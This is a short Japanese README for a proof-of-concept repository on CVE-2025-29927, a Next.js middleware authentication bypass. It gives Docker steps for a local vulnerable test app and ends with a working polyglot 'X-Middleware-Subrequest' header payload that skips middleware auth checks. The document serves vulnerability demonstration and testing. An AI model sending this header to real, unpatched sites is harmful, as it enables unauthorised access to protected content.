
CVE-2025-29927 の PoC: Next.js ミドルウェアバイパスの脆弱性。x-middleware-subrequest が認証チェックをバイパスできる仕組みを示します。テスト用の Docker セットアップが含まれています。
このリポジトリは、Next.js の CVE-2025-29927 脆弱性を実証するものです。この脆弱性では、内部ヘッダー x-middleware-subrequest を使用して、認証などのミドルウェアチェックをバイパスできます。
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env ファイルのシークレットを更新する:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
この問題の悪用は、さまざまな可能性のあるケースを効果的にカバーできるポリグロットを使用することで、大幅に簡素化できます。これは、認証バイパスの存在を確認するために使用される以下の HTTP ヘッダーで実現できました:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

